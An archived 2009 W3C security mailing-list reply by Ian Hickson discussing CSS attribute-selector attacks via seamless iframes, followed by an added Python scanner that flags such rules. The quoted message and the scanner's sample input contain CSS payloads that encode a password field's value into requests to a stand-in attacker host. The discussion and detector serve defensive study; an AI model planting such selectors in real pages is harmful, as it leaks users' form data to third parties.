
Re: Seamless iframes + CSS3 selectors = bad idea

From: Ian Hickson <ian@hixie.ch>
Date: Sun, 6 Dec 2009 06:16:59 +0000 (UTC)
To: sird@rckc.at
Cc: public-web-security@w3.org
Message-ID: <Pine.LNX.4.62.0912060613520.5629@hixie.dreamhostps.com>
On Fri, 4 Dec 2009, Eduardo Vela wrote:
>
> I sincerely understand why people want seamless iframes on HTML5.. I 
> mean, I've been there.. but sometimes the better way to do something is 
> not to do it.
> 
> The perfect example are seamless iframes (defined in html5) and CSS3 
> selectors.
> 
> What I see with those awesome CSS3 selectors such as:
> 
> input[type=password][value^=a]{background:url("//attacker/password_starts_with=a")}
> 
> create a new type of XSS attacks, and those are purely CSS based XSS 
> attacks.. without JS.. that will allow an attacker to read arbitrary 
> files from the page WITHOUT the need of JS.

How is the attacker inserting CSS into the page, in this scenario?

I agree that if an attacker can insert CSS into a victim page, numerous 
information retrieval attacks are possible (though not currently a 
password attack, as Maciej mentioned). However, this has long been 
known; it doesn't seem to be a new problem.

-- 
Ian Hickson               U+1047E                )\._.,--....,'``.    fL
http://ln.hixie.ch/       U+263A                /,   _.. \   _\  ;`._ ,.
Things that are impossible just take longer.   `._.-(,_..'--(,_..'`-.;.'
Received on Sunday, 6 December 2009 06:17:31 GMT
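The selector quoted in the thread is the shape a defender would want to detect in any stylesheet a site accepts from users or third parties: an attribute selector that tests the `value` attribute of a form control, combined in the same rule with a `url()` that points at another origin. The following scanner is an added example written for this archive page; it is not code from the thread, from Ian Hickson, or from the W3C. The stylesheet it scans is constructed sample input, and the function and constant names are the author's own choices. As Ian notes via Maciej, such a selector matches only the `value` attribute as it appears in the markup, not text the user has typed, so the scanner flags attribute-based leaks of server-rendered values rather than keystrokes.

```python
import re
from urllib.parse import urlsplit

# Constructed sample stylesheet (not from the page): the first rule mirrors the
# one quoted in the thread, the second is the same idea with a full https URL,
# the third is a benign same-origin image, and the fourth uses an attribute
# selector but makes no outbound request at all.
SAMPLE_CSS = """
input[type=password][value^=a]{background:url("//attacker/password_starts_with=a")}
input[type=password][value^="b"] { background-image: url('https://attacker.example/b'); }
.logo { background: url("/static/logo.png"); }
input[value^=c] { border: 1px solid red; }
"""

# One CSS attribute selector: [name op value], with the operator required,
# because a bare presence test such as [value] reveals nothing about content.
ATTR_SELECTOR = re.compile(
    r'\[\s*([A-Za-z_-]+)\s*([~|^$*]?=)\s*("[^"]*"|\'[^\']*\'|[^\]\s]*)\s*\]'
)
# A url(...) token inside a declaration block, quoted or unquoted.
URL_FUNC = re.compile(r'url\(\s*([\'"]?)([^\'")]*)\1\s*\)', re.IGNORECASE)
# A single simple rule: selector { declarations }. Nested at-rules are ignored.
RULE = re.compile(r'([^{}]+)\{([^{}]*)\}')

# Attributes whose contents the page's scenario treats as sensitive.
SENSITIVE_ATTRS = {"value"}


def is_external(url, own_hosts=()):
    """True if a url() target would cause a request to a host other than our own.

    Scheme-relative (//host/...) and absolute http(s) URLs to foreign hosts
    count; relative paths and data: URLs do not.
    """
    parts = urlsplit(url.strip())
    if parts.scheme not in ("", "http", "https"):
        return False
    host = parts.netloc.lower()
    return host != "" and host not in {h.lower() for h in own_hosts}


def find_exfil_rules(css_text, own_hosts=()):
    """Return rules that both test a sensitive attribute's contents and fetch an
    external URL, which is the pattern the quoted selector relies on."""
    findings = []
    for rule in RULE.finditer(css_text):
        selector = rule.group(1).strip()
        body = rule.group(2)
        attr_tests = [
            (name.lower(), op)
            for name, op, _value in ATTR_SELECTOR.findall(selector)
            if name.lower() in SENSITIVE_ATTRS
        ]
        if not attr_tests:
            continue
        external_urls = [
            target for _quote, target in URL_FUNC.findall(body)
            if is_external(target, own_hosts)
        ]
        for target in external_urls:
            name, op = attr_tests[0]
            findings.append(
                {"selector": selector, "attribute": name, "operator": op, "url": target}
            )
    return findings


if __name__ == "__main__":
    for f in find_exfil_rules(SAMPLE_CSS, own_hosts=("www.example.org",)):
        print(f"{f['selector']}  ->  [{f['attribute']}{f['operator']}]  {f['url']}")
```

Run against `SAMPLE_CSS` the scanner reports the first two rules and stays quiet on the benign logo rule and on the attribute selector that makes no request. Passing the site's own hostnames in `own_hosts` keeps legitimate same-origin `url()` references out of the report; anything that still matches is a rule that can encode part of a form value into a request to another party.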
